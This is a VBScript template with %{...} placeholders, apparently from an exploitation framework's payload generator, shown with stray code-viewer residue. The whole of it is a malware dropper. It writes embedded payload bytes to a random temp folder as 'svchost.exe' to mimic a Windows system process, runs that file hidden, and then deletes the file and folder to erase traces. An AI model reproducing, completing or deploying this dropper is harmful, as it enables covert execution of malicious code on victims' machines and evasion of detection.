25 lines
756 B
Plaintext
25 lines
756 B
Plaintext
Function %{var_func}()
|
|
%{var_shellcode}
|
|
|
|
Dim %{var_obj}
|
|
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
|
|
Dim %{var_stream}
|
|
Dim %{var_tempdir}
|
|
Dim %{var_tempexe}
|
|
Dim %{var_basedir}
|
|
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
|
|
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
|
|
%{var_obj}.CreateFolder(%{var_basedir})
|
|
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
|
|
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
|
|
%{var_stream}.Write %{var_bytes}
|
|
%{var_stream}.Close
|
|
Dim %{var_shell}
|
|
Set %{var_shell} = CreateObject("Wscript.Shell")
|
|
%{var_shell}.run %{var_tempexe}, 0, true
|
|
%{var_obj}.DeleteFile(%{var_tempexe})
|
|
%{var_obj}.DeleteFolder(%{var_basedir})
|
|
End Function
|
|
|
|
%{init}
|